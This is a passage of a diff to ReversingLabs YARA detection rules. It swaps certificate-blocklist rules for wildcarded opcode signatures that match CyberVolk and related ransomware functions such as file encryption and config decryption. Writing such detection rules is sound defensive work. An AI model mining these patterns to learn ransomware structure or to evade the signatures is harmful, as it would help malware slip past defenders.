+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 6A ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 64 A1 ?? ?? ?? ?? 83 C4 ?? 8B 40 ?? 50 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? A3 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? FF D0 85 C0 78 ?? A1 ?? ?? ?? ?? 8D 0C 85 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? A3 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? F0 FF 0D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8B 35
+        }
+		$fnv1a_hashing_v2 = {
+            55 8B EC 83 EC ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 8B 40 ?? 8B 00 8B 50 ?? A1 ?? ?? ?? ??
+            89 55 ?? 85 C0 0F 85 ?? ?? ?? ?? 85 D2 75 ?? 33 C0 A3 ?? ?? ?? ?? 8B E5 5D C3 8B 42
+            ?? 8B 4C 10 ?? 8B 44 10 ?? 89 45 ?? 8D 04 11 89 45 ?? 3B C2 74 ?? 53 33 C9 56 57 89
+            4D ?? 39 48 ?? 74 ?? 8B 78 ?? 03 FA 8B 07 BE
+        }
+		$decrypt_configuration_v2_1 = {
+            55 8B EC 51 53 56 57 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 03 C9 83 EA ?? 75 ?? 68 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? BA 25 1B 00 00 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? BA 78 0C 00 00 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            BA 39 28 00 00 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BA F1 40
+            00 00 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BA BF 11 00 00 B9
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BA 28 02 00 00 B9 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BA 3B 07 00 00 B9 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BA A5 04 00 00 B9 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? BA 0F 03 00 00 B9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 33 C9 BE ?? ?? ?? ?? 85 FF 74 ?? 8B 15 ??
+            ?? ?? ?? 0F 1F 44 00 ?? 80 3C 0A ?? 8D 46 ?? 0F 45 C6 41 8B F0 3B CF 72 ?? 8D 0C B5
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 89 1D ?? ?? ?? ?? 85 DB 74 ?? 33 FF 85 F6 74 ?? 90
+            B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 89 04 BB 47 3B FE 72 ?? 8B 0D ?? ??
+            ?? ?? 33 F6 E8 ?? ?? ?? ?? 85 C0 74 ?? 0F 1F 80 ?? ?? ?? ?? 8B 14 B3 8A 08 8D 40 ??
+            88 0A 8D 52 ?? 84 C9 75 ?? 33 C9 E8 ?? ?? ?? ?? 46 85 C0 75 ?? C7 04 B3 ?? ?? ?? ??
+            5F 5E 5B 8B E5 5D C3
+        }
+		$decrypt_configuration_v2_2 = {
+            55 8B EC 51 53 56 57 8B F2 8B F9 6B CE ?? E8 ?? ?? ?? ?? 8B C8 33 C0 89 4D ?? 85 C9
+            0F 84 ?? ?? ?? ?? 85 F6 74 ?? 83 FE ?? 72 ?? 0F 28 0D ?? ?? ?? ?? 8B CE 83 E1 ?? 66
+            0F 1F 84 00 ?? ?? ?? ?? 0F 10 04 07 66 0F EF C1 0F 11 04 07 0F 10 44 07 ?? 66 0F EF
+            C1 0F 11 44 07 ?? 0F 10 44 07 ?? 66 0F EF C1 0F 11 44 07 ?? 0F 10 44 07 ?? 66 0F EF
+            C1 0F 11 44 07 ?? 83 C0 ?? 3B C1 72 ?? 8B 4D ?? 3B C6 73 ?? 80 34 38 5F 40 3B C6 72
+            ?? 8B 5D ?? 8B D6 51 53 51 8B CF E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 0B E8 ?? ??
+            ?? ?? 8B F8 8B 45 ?? 89 38 8B 45 ?? 85 FF 74 ?? 8B 0B 8B F0 F3 A4 8B C8 BE ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B C6 5F 5E 5B 8B E5 5D C3
+        }
+		$encrypt_files_v2_p1 = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 56 57 66 90 64 A1 ?? ?? ?? ?? 0F 57 C0 C7 44 24
+            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 66 0F 13 44 24 ?? 8B 40 ?? 8B 40 ?? 8B 00 8B
+            50 ?? A1 ?? ?? ?? ?? 89 54 24 ?? 85 C0 0F 85 ?? ?? ?? ?? 85 D2 0F 84 ?? ?? ?? ?? 8B
+            42 ?? 8B 4C 10 ?? 8D 04 11 89 44 24 ?? 3B C2 74 ?? 33 C9 89 4C 24 ?? 39 48 ?? 74 ??
+            8B 40 ?? 03 C2 89 44 24 ?? 0F 1F 80 ?? ?? ?? ?? 8B 30 BF C5 9D 1C 81 8A 04 16 03 F2
+            46 84 C0 74 ?? 0F BE D0 8D 76 ?? 2C ?? 8B CA 83 C9 ?? 3C ?? 8A 46 ?? 0F 47 CA 33 CF
+            69 F9 93 01 00 01 84 C0 75 ?? 8B 54 24 ?? 8B 4C 24 ?? 81 FF ?? ?? ?? ?? 74 ?? 8B 74
+            24 ?? 41 8B 44 24 ?? 83 C0 ?? 89 4C 24 ?? 89 44 24 ?? 3B 4E ?? 75 ?? 33 C0 A3 ?? ??
+            ?? ?? 6A ?? 8D 4C 24 ?? 51 8D 4C 24 ?? 51 8D 4C 24 ?? 51 FF 35 ?? ?? ?? ?? FF D0 85
+            C0 0F 88 ?? ?? ?? ?? 8B 74 24 ?? 85 F6 0F 84 ?? ?? ?? ?? 8B 7C 24 ?? 8B 07 48 83 F8
+            ?? 0F 87 ?? ?? ?? ?? FF 24 85 ?? ?? ?? ?? 8B 74 24 ?? 8B 46 ?? 8D 04 48 0F B7 0C 10
+            8B 46 ?? 8D 04 88 8B 04 10 03 C2 EB ?? 83 7F ?? ?? 0F 85 ?? ?? ?? ?? 83 7F ?? ?? 0F
+            85 ?? ?? ?? ?? C7 07 ?? ?? ?? ?? 8B 4C 24 ?? 8B 54 24 ?? 68 ?? ?? ?? ?? 6A ?? 8B 41
+            ?? 89 42 ?? 8B 41 ?? 89 42 ?? 8B 44 24 ?? 6A ?? 8B 40 ?? 8D 88 ?? ?? ?? ?? F7 D8 23
+            C8 8B 44 24 ?? 89 48 ?? 8D 4C 24 ?? 8B 54 24 ?? 8B 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ??
+            8D 84 24 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ??
+            ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 6A ??
+            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? FF 76 ?? FF 76 ?? FF 15 ?? ?? ?? ?? 8B 4E
+            ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 8B 46 ?? 81 C1 ?? ?? ?? ?? 03 C1 50 E8 ?? ?? ?? ??
+            8B 4C 24 ?? 83 C4 ?? 8B 74 24 ?? 89 74 24 ?? 6A ?? 8D 41 ?? 50 FF 71 ?? 8D 41 ?? FF
+        }
+		$encrypt_files_v2_p2 = {
+            71 ?? 50 51 6A ?? 6A ?? FF 76 ?? E8 ?? ?? ?? ?? FF D0 85 C0 0F 89 ?? ?? ?? ?? 83 C8
+            ?? F0 0F C1 46 ?? 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 46 ?? 83 C4 ??
+            33 FF 85 C0 0F 84 ?? ?? ?? ?? 83 C6 ?? 8B 0E E8 ?? ?? ?? ?? 8B 44 24 ?? 8D 76 ?? 47
+            8B 40 ?? 3B F8 72 ?? 8B 74 24 ?? 85 C0 E9 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 56 ?? 8B C1
+            F0 0F B1 0A 83 F8 ?? 75 ?? 8B 46 ?? 89 44 24 ?? 0F B7 46 ?? 83 C0 ?? 8B C8 89 44 24
+            ?? E8 ?? ?? ?? ?? 8B F8 85 FF 74 ?? 0F B7 4E ?? 51 FF 76 ?? 8D 4F ?? 51 E8 ?? ?? ??
+            ?? 0F B7 46 ?? 83 C4 ?? 89 47 ?? 0F 57 C0 8D 44 24 ?? C6 07 ?? C7 47 ?? ?? ?? ?? ??
+            6A ?? FF 74 24 ?? 66 0F 13 44 24 ?? 57 50 FF 74 24 ?? E8 ?? ?? ?? ?? FF D0 8B CF E8
+            ?? ?? ?? ?? 8D 56 ?? 85 F6 0F 84 ?? ?? ?? ?? 83 C8 ?? F0 0F C1 02 0F 85 ?? ?? ?? ??
+            6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 4E ?? 83 C4 ?? C7 44 24 ?? ?? ?? ?? ?? 85 C9 0F 84
+            ?? ?? ?? ?? 8D 7E ?? 90 8B 0F E8 ?? ?? ?? ?? 8B 44 24 ?? 8D 7F ?? 8B 4E ?? 40 89 44
+            24 ?? 3B C1 72 ?? E9 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 8D 56 ?? 74 ?? 8D 8C 24 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 47 ?? 8B 57 ?? 50 50 8D 47 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B
+            C1 6A ?? EB ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 47 ?? 8D 8C 24 ?? ?? ?? ?? 8B
+            57 ?? 50 50 8D 47 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 54 24 ?? 83 C4 ?? 83 7A ?? ?? 8B 42 ?? 0F 8F ??
+            ?? ?? ?? 7C ?? 39 42 ?? 0F 87 ?? ?? ?? ?? 8B 74 24 ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ??
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 4E
+        }
+		$encrypt_files_v2_p3 = {
+            8D 84 24 ?? ?? ?? ?? 83 C4 ?? 81 C1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 8B 46 ?? 03 C1 50
+            E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? C7 00 ?? ?? ?? ?? EB ?? 8B 44 24 ?? C7 00 ?? ??
+            ?? ?? 8B 4C 24 ?? 8B 74 24 ?? 6A ?? 89 74 24 ?? 8D 41 ?? 50 FF 71 ?? 8D 41 ?? FF 71
+            ?? 50 51 6A ?? 6A ?? FF 76 ?? E8 ?? ?? ?? ?? FF D0 85 C0 0F 89 ?? ?? ?? ?? 83 C8 ??
+            F0 0F C1 46 ?? 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 46 ?? 83 C4 ?? 33
+            FF 85 C0 0F 84 ?? ?? ?? ?? 83 C6 ?? 8B 0E E8 ?? ?? ?? ?? 8B 44 24 ?? 8D 76 ?? 47 8B
+            40 ?? 3B F8 72 ?? 8B 74 24 ?? 85 C0 E9 ?? ?? ?? ?? 83 C8 ?? F0 0F C1 46 ?? 0F 85 ??
+            ?? ?? ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 4E ?? 83 C4 ?? C7 44 24 ?? ?? ?? ?? ?? 85
+            C9 0F 84 ?? ?? ?? ?? 8D 7E ?? 66 0F 1F 44 00 ?? 8B 0F E8 ?? ?? ?? ?? 8B 44 24 ?? 8D
+            7F ?? 8B 4E ?? 40 89 44 24 ?? 3B C1 72 ?? E9 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 56 ?? 8B
+            C1 F0 0F B1 0A 83 F8 ?? 75 ?? 8B 46 ?? 89 44 24 ?? 0F B7 46 ?? 83 C0 ?? 8B C8 89 44
+            24 ?? E8 ?? ?? ?? ?? 8B F8 85 FF 74 ?? 0F B7 4E ?? 51 FF 76 ?? 8D 4F ?? 51 E8 ?? ??
+            ?? ?? 0F B7 46 ?? 83 C4 ?? 89 47 ?? 0F 57 C0 8D 44 24 ?? C6 07 ?? C7 47 ?? ?? ?? ??
+            ?? 6A ?? FF 74 24 ?? 66 0F 13 44 24 ?? 57 50 FF 74 24 ?? E8 ?? ?? ?? ?? FF D0 8B CF
+            E8 ?? ?? ?? ?? 8D 56 ?? 85 F6 0F 84 ?? ?? ?? ?? 83 C8 ?? F0 0F C1 02 0F 85 ?? ?? ??
+            ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 4E ?? 83 C4 ?? C7 44 24 ?? ?? ?? ?? ?? 85 C9 74
+            ?? 8D 7E ?? 8B 0F E8 ?? ?? ?? ?? 8B 44 24 ?? 8D 7F ?? 8B 4E ?? 40 89 44 24 ?? 3B C1
+            72 ?? 85 C9 74 ?? F0 FF 05 ?? ?? ?? ?? F0 FF 0D ?? ?? ?? ?? 8B 46 ?? 85 C0 74 ?? 50
+            E8 ?? ?? ?? ?? FF D0 8D 46 ?? 50 E8 ?? ?? ?? ?? FF D0 8B CE E8 ?? ?? ?? ?? E9 ?? ??
+            ?? ?? 5F 33 C0 5E 8B E5 5D C2
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ABADAN PIZZA LTD" and pe.signatures [ i ] . serial == "5a:59:a6:86:b4:a9:04:d0:fc:a0:71:53:ea:6d:b6:cc" and 1563403380 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( ( $enum_resources_v1 ) and ( all of ( $find_files_v1_* ) ) and ( all of ( $encrypt_files_v1_* ) ) ) or ( ( $check_blacklisted_languages_v2 ) and ( $fnv1a_hashing_v2 ) and ( $create_net_host_trav_threads_v2 ) and ( all of ( $decrypt_configuration_v2_* ) ) and ( all of ( $encrypt_files_v2_p* ) ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0B6D8152F4A06Ba781C6677Eea5Ab74B : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Cybervolk : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects CyberVolk ransomware."
 		author = "ReversingLabs"
-		id = "dacac5fe-00dc-5080-a725-9ef69473c45e"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "4d8bf096-d5c9-5a77-99e6-2c66e480da36"
+		date = "2024-11-27"
+		modified = "2024-11-27"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3324-L3340"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.CyberVolk.yara#L1-L293"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "bd20cf8e4cab2117361dbe05ae2efe813e7f55667b1f3825cd893313d98dcb5f"
+		logic_hash = "59ed7c4f576fa7cd4cceb724d14f258598c140e434ed309fe2e599c3aaa667d9"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "CyberVolk"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GLARYSOFT LTD" and pe.signatures [ i ] . serial == "0b:6d:81:52:f4:a0:6b:a7:81:c6:67:7e:ea:5a:b7:4b" and 1568246400 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_3Ad60Cea73E1Dd1A3E6C02D9B339C380 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "80b39632-29a7-5932-a47b-736a9e8ed686"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3342-L3358"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "fb83cf25be19e7cccd2c8369c3a37a90af72cb2f76db3619b8311d2a851335a8"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$manage_gui_p1 = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? 57 50
+            6A ?? 6A ?? 6A ?? 6A ?? FF D6 8D 84 24 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 0F 84 ??
+            ?? ?? ?? 83 F8 ?? 74 ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 6A ?? FF
+            D6 6A ?? 8B F8 FF D6 8B 75 ?? 99 2B C2 6A ?? D1 F8 68 ?? ?? ?? ?? 2D ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 50 8B C7 99 2B C2 D1 F8 2D ?? ?? ?? ?? 50 6A ?? 56 FF 15 ?? ?? ?? ?? 6A
+            ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 8B E5 5D C2 ?? ??
+            80 3D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 50 FF
+            15 ?? ?? ?? ?? 89 44 24 ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B
+            F0 83 C4 ?? BF ?? ?? ?? ?? 85 F6 74 ?? 56 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 56 E8 ??
+            ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 4F 50 FF 75 ?? 89 7C 24 ?? FF 15 ?? ?? ?? ?? 8B F8 57
+            89 7C 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? 8B 35 ?? ?? ?? ?? 50 89 44 24 ?? FF D6 89
+            44 24 ?? 8D 44 24 ?? 50 6A ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A
+            ?? FF 74 24 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ??
+            6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ??
+            ?? ?? ?? 50 57 FF D6 8B 74 24 ?? B8 ?? ?? ?? ?? F7 EE B8 ?? ?? ?? ?? 03 D6 C1 FA ??
+            8B FA C1 EF ?? 03 FA F7 EE 03 D6 C1 FA ?? 8B CA C1 E9 ?? 03 CA 8B D1 C1 E2 ?? 2B D1
+        }
+		$manage_gui_p2 = {
+            C1 E2 ?? 8B CE B8 ?? ?? ?? ?? 2B CA 51 69 CF ?? ?? ?? ?? 2B F1 F7 EE 03 D6 C1 FA ??
+            8B C2 C1 E8 ?? 03 C2 50 57 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 8D 44 24 ?? 6A ?? 50 6A ?? 8D 84 24 ?? ?? ?? ?? 50 FF 74 24 ?? FF 15 ?? ?? ??
+            ?? FF 74 24 ?? 8B 74 24 ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50
+            FF 75 ?? FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B
+            F0 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? 8B 7C 24 ?? 8D 84 24 ?? ?? ?? ?? 57 68 ?? ?? ??
+            ?? 50 E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 83 C4 ?? 8D 51 ?? 0F 1F 40 ?? 8A 01 41 84
+            C0 75 ?? 56 2B CA 8D 84 24 ?? ?? ?? ?? 51 6A ?? 50 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ??
+            83 C4 ?? 33 C0 5F 5E 8B E5 5D C2 ?? ?? 8B 3D ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF 75
+            ?? FF D7 8B 35 ?? ?? ?? ?? 50 FF D6 8B 45 ?? 6A ?? 68 ?? ?? ?? ?? 50 FF D7 50 FF D6
+            8B 75 ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? 8D 44 24
+            ?? 50 56 FF 15 ?? ?? ?? ?? 50 89 44 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? 8B 3D ?? ??
+            ?? ?? 50 89 44 24 ?? FF D7 8B F0 8D 44 24 ?? 50 6A ?? FF 74 24 ?? FF 15 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 6A ?? 6A ?? FF 74 24 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF
+            74 24 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 6A ?? FF 74
+            24 ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24
+            ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A
+            ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 74 24 ?? FF D7 6A
+            ?? 8D 44 24 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 56 8B 74 24
+        }
+		$manage_gui_p3 = {
+            56 FF D7 56 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 33 C0 5F
+            5E 8B E5 5D C2 ?? ?? 0F B7 45 ?? 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 0F 84 ?? ?? ?? ??
+            83 E8 ?? 0F 84 ?? ?? ?? ?? 2D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 7D ?? 6A ?? 68 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 6A ?? 8D 44 24
+            ?? C7 44 24 ?? ?? ?? ?? ?? 50 0F 57 C0 C6 44 24 ?? ?? 68 ?? ?? ?? ?? 57 0F 29 44 24
+            ?? 0F 29 44 24 ?? FF 15 ?? ?? ?? ?? 8D 4C 24 ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA
+            83 F9 ?? 74 ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 33 C0 5F 5E 8B E5
+            5D C2 ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 50
+            6A ?? 6A ?? 6A ?? 6A ?? FF D6 8D 84 24 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 8B F0 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? 56 6A ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ??
+            ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5F 5E 8B E5 5D C2 ?? ?? 6A ?? FF 75 ?? FF 15 ??
+            ?? ?? ?? B8 ?? ?? ?? ?? 5F 5E 8B E5 5D C2 ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0
+            56 FF 15 ?? ?? ?? ?? 0F 10 05 ?? ?? ?? ?? 0F 11 00 0F 10 05 ?? ?? ?? ?? 0F 11 40 ??
+            F3 0F 7E 05 ?? ?? ?? ?? 66 0F D6 40 ?? 66 8B 0D ?? ?? ?? ?? 66 89 48 ?? 8A 0D ?? ??
+            ?? ?? 88 48 ?? EB ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ??
+            8B F0 56 FF 15 ?? ?? ?? ?? 0F 10 05 ?? ?? ?? ?? 0F 11 00 0F 10 05 ?? ?? ?? ?? 0F 11
+            40 ?? 66 8B 0D ?? ?? ?? ?? 66 89 48 ?? 8A 0D ?? ?? ?? ?? 88 48 ?? 56 FF 15 ?? ?? ??
+            ?? 6A ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 56 6A ?? FF 15 ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? 33 C0 5F 5E 8B E5 5D C2 ?? ?? 3D ?? ?? ?? ?? 75 ?? 81 7D
+        }
+		$find_files_v1_p1 = {
+            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 56 57 8B FA 8B D9 89 5D ?? 66 83 FF ?? 75
+            ?? 80 3D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50
+            E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B CB 89 45 ?? 83 C4 ?? 66 A1 ?? ?? ?? ?? 66 89 45 ??
+            8D 51 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 81 F9 ?? ?? ?? ?? 0F 87 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 0F B7 0B 0F B7 95 ?? ??
+            ?? ?? 8B D9 8B F2 8D 41 ?? 0F B7 C0 8D 4A ?? 89 45 ?? 66 83 F9 ?? 8D 46 ?? 0F B7 D0
+            8B C6 8B 35 ?? ?? ?? ?? 0F 47 D0 66 83 7D ?? ?? 8D 43 ?? 0F B7 C8 8B C3 0F 47 C8 66
+            3B D1 0F 85 ?? ?? ?? ?? 66 83 7D ?? ?? 8D 43 ?? 0F B7 C8 8B C3 8B 5D ?? 0F 47 C8 0F
+            B7 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 66 89 0B 68 ?? ?? ?? ?? 50 FF
+            D6 8D 8D ?? ?? ?? ?? 83 C4 ?? 8D 51 ?? 0F 1F 80 ?? ?? ?? ?? 66 8B 01 83 C1 ?? 66 85
